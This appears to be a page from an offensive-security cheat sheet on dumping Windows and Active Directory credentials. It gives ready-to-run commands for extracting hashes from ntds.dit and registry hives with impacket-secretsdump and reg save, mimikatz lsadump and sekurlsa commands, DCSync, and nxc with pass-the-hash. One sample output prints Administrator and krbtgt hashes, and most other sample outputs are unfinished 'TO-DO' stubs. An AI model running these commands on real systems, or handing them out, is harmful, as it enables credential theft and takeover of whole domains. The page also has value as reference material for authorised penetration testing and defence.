Usage Tips:
- Click on a keyword to enable inline editing.
- Click inside a code block to copy (excludes comments).
- Use the button to view examples.
- Click outside to collapse all examples.
Convert ntds.dit to .sqlite
ntdsdotsqlite ntds.dit --system SYSTEM -o ntds.sqlite
Sample Output:
TO-DORef: ntdsdotsqlite
With ntds.dit and SYSTEM hive
impacket-secretsdump -ntds ntds.dit -system system LOCAL
Sample Output:
$ impacket-secretsdump -ntds ntds.dit -system system LOCAL
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:7f82cc4be7ee6ca0b417c0719479dbec:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
...[SNIP]...
[*] Cleaning up...
With SAM, SYSTEM and SECURITY Hives
impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL
Sample Output:
TO-DOreg save HKLM\SYSTEM system
Sample Output:
TO-DOreg save HKLM\security security
Sample Output:
TO-DOreg save hklm\sam sam
Sample Output:
TO-DO.\mimikatz.exe "lsadump::secrets /system:SYSTEM /security:SECURITY"
Sample Output:
TO-DO.\mimikatz.exe "lsadump::sam /system:SYSTEM /sam:SAM"
Sample Output:
TO-DOreg save HKLM\SYSTEM system
Sample Output:
TO-DOreg save HKLM\security security
Sample Output:
TO-DOreg save hklm\sam sam
Sample Output:
TO-DOmimikatz -- '"lsadump::secrets /system:C:\SYSTEM /security:C:\SECURITY"'
Sample Output:
TO-DOmimikatz -- '"lsadump::sam /system:C:\SYSTEM /sam:C:\SAM"'
Sample Output:
TO-DOWith Dcsync right
impacket-secretsdump '<USER>:<PASSWORD>@<TARGET>'
Sample Output:
TO-DOnxc smb <TARGET> -d <DOMAIN> -u '<USER>' -H <HASH> --ntds
Sample Output:
TO-DO.\mimikatz.exe "lsadump::dcsync /all" "exit"
Sample Output:
TO-DO# Dump old creds
.\mimikatz.exe "lsadump::dcsync /user:<DOMAIN>\<USER> /history" "exit"
Sample Output:
TO-DOWith NT AUTHORITY\SYSTEM / Administrator
.\mimikatz.exe "sekurlsa::logonpasswords"
Sample Output:
TO-DO.\mimikatz.exe "lsadump::lsa /patch"
Sample Output:
TO-DOmimikatz -- '"sekurlsa::logonpasswords"'
Sample Output:
TO-DOmimikatz -- '"lsadump::lsa /patch"'
Sample Output:
TO-DO